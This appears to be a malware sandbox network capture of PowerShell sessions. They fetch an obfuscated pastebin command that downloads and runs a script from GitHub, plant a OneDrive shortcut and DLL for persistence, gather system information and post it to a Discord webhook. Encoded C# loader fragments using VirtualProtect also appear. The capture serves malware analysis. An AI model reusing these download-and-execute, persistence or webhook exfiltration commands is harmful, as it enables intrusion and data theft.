                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 36 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 39 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 46 2c 20 30 78 30 30 2c 20 30 78
                                                                                    Data Ascii: 0x73, 0x00, 0x73, 0x00, 0x20, 0x00, 0x66, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x20, 0x00, 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x69, 0x00, 0x74, 0x00, 0x79, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x2F, 0x00, 0x
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20
                                                                                    Data Ascii: 0, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x20, 0x00, 0x64, 0x00, 0x65, 0x00, 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00,
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 45 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 39 2c 20 30 78 30 30 2c 20 30 78 33 42 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30
                                                                                    Data Ascii: x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x4E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x29, 0x00, 0x3B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 20 30 78 30 30 2c 20 30 78 34 34 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 34 42 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 33 33 2c 20 30 78 30 30 2c 20 30 78 33 32 2c 20 30 78 30 30 2c 20 30 78 34 43 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 32 2c 20 30 78
                                                                                    Data Ascii: 0x00, 0x44, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x49, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x74, 0x00, 0x28, 0x00, 0x4B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x62, 0x
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 43 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20
                                                                                    Data Ascii: E, 0x00, 0x65, 0x00, 0x77, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x74, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00, 0x2C, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x20, 0x00, 0x6C,
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 78 34 37 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30
                                                                                    Data Ascii: x47, 0x00, 0x65, 0x00, 0x74, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x28, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 36 38 2c 20 30 78 30 30 2c 20 30 78 34 44 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 45 2c 20 30 78 30 30 2c 20 30 78 35 41 2c 20 30 78 30 30 2c 20 30 78
                                                                                    Data Ascii: 0x20, 0x00, 0x28, 0x00, 0x68, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x75, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x2E, 0x00, 0x5A, 0x00, 0x
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20
                                                                                    Data Ascii: 0, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00,
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 38 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 35 2c 20 30 78 30 30 2c 20 30 78 37 38 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30
                                                                                    Data Ascii: x00, 0x20, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x20, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x77, 0x00, 0x20, 0x00, 0x45, 0x00, 0x78, 0x00, 0x63, 0x00, 0x65, 0x00, 0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.949718172.67.19.244435812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:10 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:11 UTC397INHTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 13:54:10 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 100
                                                                                    Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304cb28d70c86f-DFW
                                                                                    2024-10-15 13:54:11 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                    Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                    2024-10-15 13:54:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.949720185.199.111.1334435812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:12 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:12 UTC901INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 7508
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 13:54:12 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210151-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 1
                                                                                    X-Timer: S1729000452.382712,VS0,VE1
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: bcb4039462a3588f121cf9948f927dce3ec85cab
                                                                                    Expires: Tue, 15 Oct 2024 13:59:12 GMT
                                                                                    Source-Age: 99
                                                                                    2024-10-15 13:54:12 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                    Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                    2024-10-15 13:54:12 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                    Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                    2024-10-15 13:54:12 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                    Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                    2024-10-15 13:54:12 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                    2024-10-15 13:54:12 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                    2024-10-15 13:54:12 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.949722162.159.138.2324434860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:18 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 295
                                                                                    Connection: Keep-Alive
